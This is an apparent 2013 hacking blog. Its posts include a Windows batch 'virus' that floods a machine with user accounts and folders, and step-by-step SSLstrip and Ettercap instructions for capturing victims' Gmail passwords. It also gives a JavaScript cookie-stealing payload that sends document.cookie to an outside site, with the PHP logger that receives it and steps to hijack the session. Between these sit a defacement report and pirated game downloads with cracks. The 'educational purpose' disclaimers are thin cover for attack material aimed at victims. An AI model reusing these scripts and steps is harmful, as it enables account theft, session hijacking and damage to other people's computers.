Wednesday, 24 April 2013

How to make Bootable Pendrive without any software [How To] [Trick] video

video tut on.. How to make Bootable Pendrive without any software (in a minute)

How to create a Super Hidden folder using command prompt

How to create a Super Hidden folder using command prompt

BAT virus

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this lackey I will show you how to make simple .bat file (virus) that can’t be detected by any anti virus
Here are some good viruses ,i am not responsible for any kind of damage to your system … 
Copy this to notepad and save as flood1.bat…..
@ECHO OFF
@ECHO A way2hackintosh Creation

@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original

GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.

Tuesday, 23 April 2013

Video tut. on how to Hack E-mail with Cookie hijacking attack

Hack E-mail with Cookie hijacking attack

How To Hack Using Man In The Middle Attack | SSL Hacking

Hello hacker Friends this is one of the most common attack that most hacker do to amaze people and i am gonna make it simple for you all so that you can enjoy it and try to learn this is attack so are you all ready so lets start . every one know about http attack but this is SSL means https attack nice trick  so lets begin .. :D u can watch my video on youtube ;) 

Tools Needed:



  •  SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial



  •  Ettercap to carry out mitm attacks..

  • Steps to Perform MITM Attack

    1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok 


    2.Now select the victim’s IP and click open



    3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 




    4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


    5. Now select mitm-arp poisoning and click ok as shown 

     6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords 

    way2h security steps:-
    1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

    2. Always check the SSL certificate before doing an online transaction

    Stay Safe.Enjoy !!
    For Educational Purpose Only

    Sunday, 21 April 2013

    Google.com.om(Oman) & Google.co.ba(Bosnia) Hacked by SQL_Master & Z0mbi3_Ma, Morocco Hackers

    Google.com.om, Google.co.ba, nic.mr, Intel, orange and many local domains of Oman hacked and defaced by SQL_Master & Z0mbi3_Ma, Morocco Hackers. This time 2 counties Google Bosnia and Google Oman hacked. Technically Registrar server is hacked using SQL Injection and hackers change DNS information about sites. There is not any specific reason mention about this hack on deface page but this rise many questions for security experts that how much these hacker are getting powerful.


    Deface page Say's:
    " Hacked !
    0h0h0h!! U get F***ED BY!
    Z0mbi3_Ma And SQL_Master
    For more : Z0mbi3_Ma@hotmail.com
    ./Morocco"

    Hacked Sites List:
    intel.co.om
    orange.com.om
    google.com.om
    www.google.co.ba
    femen.org
    www.nic.mr
    www.unicef.or.th/sahel/
    2vodafone.com.fj
    dell.com.fj

    Mirrors:
    http://www.zone-h.com/archive/published=0/notifier=SQL_Master

    DNS spoofing Attack Detail's:

    DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) name server's cache database, causing the name server to return an incorrect IP address, diverting traffic to another computer (often the attacker's).
    Every country have registrar server which return the IP of local huge sites like google, msn etc. If registrar sever is compromised then we can redirect all those domains to specific ip which make it believe that sites are hacked. Basically sites are functioning properly, only there ip is hacked to hacked ip.



    Saturday, 20 April 2013

    Ninja Blade [PC Game]

    Ninja Blade

    Ninja Blade

    • Developer: FromSoftware
    • Publisher: ND Games
    • Genre: Action
    • Release Date: November 19, 2009 (US)

    About Ninja Blade

    High atop the towering skyscrapers of modern-day Tokyo, Ken Ogawa and his team of skilled ninjas are deployed to destroy the infected monster horde and stem the spreading disease as humanity hangs in the balance. Matters quickly take a turn for the worse as Ogawa and his team are betrayed from within their own ranks. After narrowly escaping death, Ogawa is left to fight the daunting battle alone while also attempting to understand the motivations behind his father's betrayal.

    Armed with an extensive arsenal of specialized ninja weapons, tools and skills including the powerful forces of Ninja Vision and Todomé Attack, players must fight insurmountable odds, and once again bring peace and order to Tokyo.

    Minimum System Requirements

    • OS: Windows XP/Vista
    • Processor: Intel Pentium 4 @ 3.2 GHz / AMD Athlon 64 3500+
    • Memory: 1 Gb
    • Hard Drive: 5 Gb free
    • Video Memory: 256 Mb
    • Video Card: nVidia GeForce 7600 / ATI Radeon X1600
    • Sound Card: DirectX Compatible
    • DirectX: 9.0c
    • Keyboard
    • Mouse
    • DVD Rom Drive

    Recommended System Requirements

    • OS: Windows XP/Vista
    • Processor: Intel Core 2 Duo @ 2.0 GHz / AMD Athlon 64 X2 4200+
    • Memory: 2 Gb
    • Hard Drive: 5 Gb free
    • Video Memory: 512 Mb
    • Video Card: nVidia GeForce 8800 / ATI Radeon HD 2900
    • Sound Card: DirectX Compatible
    • DirectX: 9.0c
    • Keyboard
    • Mouse
    • DVD Rom Drive

    ninjablade (1)

    ninjablade (2)

    ninjablade (3)

    ninjablade (4)

    ninjablade (5)

    Download Ninja Blade – Direct Links

    Part 0 – Installer

    Part 1 – 620 MB

    Part 2 – 620 MB

    Part 3 – 620 MB

    Part 4 – 620 MB

    Part 5 – 620 MB

    Part 6 – 620 MB

    Part 7 – 109 MB

    Crack

    www.elj-games.blogspot.com

    Tom Clancy’s Splinter Cell: Conviction

    Tom Clancy’s Splinter Cell: Conviction

    • Developer: Ubisoft Montreal
    • Publisher: Ubisoft
    • Genre: Action
    • Release Date: April 27, 2010 (US)

    About Tom Clancy’s Splinter Cell: Conviction

    The adventures of Sam Fisher continue in the fifth entry of the stealth-based series. In this game, all of the rules have changed, as the storyline takes a dramatic turn that will reinvent the Splinter Cell franchise forever. Fisher can no longer rely on his trusted bag of tools and iconic goggles.An investigation into his daughter's death unwittingly leads former agent Sam Fisher to discover he’s been betrayed by his prior agency, the Third Echelon. Now a renegade, Fisher finds himself in a race against time to thwart a deadly terrorist plot that threatens millions.

    Minimum System Requirements

    • OS: Windows XP/Vista/7
    • Processor: Intel Core 2 DUO @ 2.0 GHz / AMD Athlon 64 X2 3800+
    • Memory: 1.5 Gb
    • Hard Drive: 10 Gb free
    • Video Memory: 256 Mb
    • Video Card: NVIDIA GeForce 7800 / ATI Radeon X1800
    • Sound Card: DirectX Compatible
    • DirectX: 9.0c
    • Keyboard
    • Mouse
    • DVD Rom Drive

    Recommended System Requirements

    • OS: Windows XP/Vista/7
    • Processor: Intel Core 2 DUO @ 3.0 GHz / AMD Athlon 64 X2 4600+
    • Memory: 3 Gb
    • Hard Drive: 10 Gb free
    • Video Memory: 512 Mb
    • Video Card: NVIDIA GeForce GTX 260 / ATI Radeon HD 4870
    • Sound Card: DirectX Compatible
    • DirectX: 10
    • Keyboard
    • Mouse
    • DVD Rom Drive

    Download Tom Clancy’s Splinter Cell: Conviction – Direct Links

    Part 1 – 700 MB

    Part 2 – 700 MB

    Part 3 – 700 MB

    Part 4 – 700 MB

    Part 5 – 700 MB

    Part 6 – 700 MB

    Part 7 – 700 MB

    Part 8 – 700 MB

    Part 9 – 700 MB

    Part 10 – 700 MB

    Part 11 – 700 MB

    Part 12 – 211 MB

    Crack

    www.elj-games.blogspot.com

    Friday, 19 April 2013

    Tom Clancy's Rainbow Six: Lockdown

     R6Lockdown_SCAN

    Tom Clancy's Rainbow Six: Lockdown

    • Developer: Red Storm Entertainment
    • Publisher: Ubisoft
    • Genre: Shooter
    • Release Date: February 14, 2006 (US)

    About Tom Clancy's Rainbow Six: Lockdown

    In this new episode, you lead Team Rainbow, the world's most elite counter-terrorist unit, as they are called into action and unfamiliar territory to battle a bioterrorist threat. Stakes escalate as they are personally targeted by an evil terrorist organization. Used to protecting the lives of others, Team Rainbow must now embark on a mission to fight and save some of their own.

    Minimum System Requirements

    • OS: Windows 2000/XP
    • Processor: 1.5 GHz
    • Memory: 512 MB
    • Hard Drive: 7 GB Free
    • Video Memory: 64 MB
    • Sound Card: DirectX Compatible
    • DirectX: 9.0c
    • Keyboard & Mouse
    • CD/DVD Rom Drive
       54
     
    57
     
    29
     
    32
     
    35

    Download Tom Clancy's Rainbow Six: Lockdown – Direct Links

    Part 1 – 700 MB

    Part 2 – 700 MB

    Part 3 – 700 MB

    Part 4 – 700 MB

    Part 5 – 700 MB

    Part 6 – 263 MB

    www.elj-games.blogspot.com

    Wednesday, 17 April 2013

    How to hack Facebook??(All Methods)

     normally every day some one ask me how to hack facebook?, hey do u know how to hack fb?,plz hack this account, i need my gf's password, etc  now you are one of them then read this whole article and you will come to know how difficult to hack and not always you get successive result, but yes you can hack facebook account :) ;)


    The Only Two Methods By Which You Can Hack Facebook Is
    • Hire A Professional Hacker Who Will Hack For You
    • Or Just Learn All These Methods which i'm Gonna Provide you

    Facebook Hacking Methods Are Following:

    1.    Session Hijacking Attack
    2.    Facebook Security
    3.    Cookie Stealing Attack
    4.    Keylogging
    5.    Clickjacking
    6.    Tabnabbing
    7.    Remote Administration Tools
    8.    Social Engineering Attack
    9.   Phishing attack
    10.  Using 3 Fake Friends Method

    •  Session Hijacking Attack :- What Is Session Hijacking Attack ? Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by surreptitiously obtaining the session ID and masquerading as the authorized user. Once the user's session ID has been accessed (through session prediction), the attacker can masquerade as that user and do anything the user is authorized to do on the network.

    •     Facebook Security :- When you bookmark the URL for Facebook or any of your other social networks, be sure to use HTTPS instead of HTTP. This encrypts your communications. In fact, you will have to temporarily disable this feature any time you give access to a new application. That alone should give you confidence that you have achieved a greater level of protection.
    •  Cookie Stealing Attack :- In this tutorial i will explain how you can hack a Facebook/twitter accounts by stealing cookies. This method works only when the victims computer is in a LAN (local area network ).Best place to try out this is in schools ,collages ,cafes . where computers are connected in LAN .Before i proceed let me first...
    •     Keylogging :- What Is Keyloggers? Using key logger utility you will be able to establish full control over your computer. You will also find out, what was going on your computer in your absence: what was run and typed etc which act as best children internet protection software. Using the keylogging program constantly,...
    •     Clickjacking :- What is Clickjacking? Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows...
    •     Tabnabbing :- Hey friends,It's Chris Defaulter Valentine.An Microsoft Certified Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years' Experience Circumventing Information Security Measures And Can Report That I've Successfully Compromised All Systems That I Targeted For Unauthorized Access Except One. I Have...
    •  Remote Administration Tools :- A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands...
    •  Social Engineering Attack :- I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before i talk about the 'Game', I want to go into detail about Basic knowledge and self preparation. Basic knowledge and self preparation: It's...
    •     Phishing attack :- Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include...
    •     Using 3 Fake Friends Method :- Hack Facebook Account" is most popular term is the in Web, Previously I posted many articles on "Hack Facebook Accounts" with Keyloggers, phishing, etc but that Hacking Of Facebook Account methods are not working fine now a days. So Hackers have to go smarter and we have found a new security hole
    Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get up to 40 years of imprisonment, if got caught in doing so.  

    How to hack into an email/facebook/any account - Cookie hijacking


     yesterday  i got mail about cookie hijacking so i find the best way to do and i post it enjoy

    Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
    What is a Cookie Logger?

    A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

    Today I am going to show How to make your own Cookie Logger


    Note :- This Tutorial is For Education Purpose Only… & Its For Better Security For Ur Self…


    Step 1  :- First you have to create a file which can capture a person's cookie.So follow the following process.  

    this is last step actually ↓ 

      Give this code to victim to run in his browser (notice that here site name is way2h.blogspot.com)


    javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 


    Step 2 :- Now you have to change "http://www.way2h.blogspot.com/" to your site, Remember one thing you should not upload the files into a directory.


    Step 3 :- Copy the Following Script into a Notepad File and Save the file as cookie.php:

      <?php
    $filename = "logfile.txt";
    if (isset($_GET["ex"]))
    {
    if (!$handle = fopen($filename, 'a'))
    {
    exit;
    }
    else
    {
    if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
    {

    exit;
    }
    }

    header("Location: http://ilovemessenger.msn.com");
    fclose($handle);
    exit;
    }
    exit;
    ?>


    Upload this file to your server

     cookie.php -> http://www.yoursite.com/cookielogger.php

    If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

    www.ofees.net
    www.t35.com
    www.ripway.com
    http://my3gb.com/
    http://000webhost.com/

    Step 5:- Now your cookie logger is ready to be used. Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

    Note :- Give Ur Victim The Link Of GIF File… 

    javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 

    So the person who click it will think it is fun but it redirects to http://ilovemessenger.msn.com


    Step 6 :- So if anyone open you it  will get a the cookie in the logfile.txt


    Step 7 :- And something like this will be stored in your "logfile.txt"

     phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

    Step 8 :- To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

    Now for this you will need a firefox addon named "Add and edit cookies

    Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session…


    So if the Victim clicks on Logout you will also Logout automatically…
    but once you have changed the password then you can again login with the new password… but the victim would not be able to login with it…

    MUST READ :- I don’t take any responsibility for what you do with this script…Its Only for Educational purpose only…


    How To Get Secure From Cookie Loggers / Cookie Stealer ???

    •  use NO SCRIPT (its a firefox addon )  this is best rest of other :P
    • Don’t Click On Any Links Given By Anyone…
    • Use Secure Connection Security In Facebook…
    • Use Login Notifications For Better Security…
    • Don’t Click On SPAM Links Videos Or Pics…
    • Never Ever Try RATS or KeyLoggers…
    • Be Safe…Don’t Use Any Softwares For Hacking…Coz All Are Fakes…
    • Hacking is Not Playing With SomeOne’s Account… 
    • Real Hacking is Much More Than It…
    All The Hackers are Not Same… We are Humans & We Had Heart Also…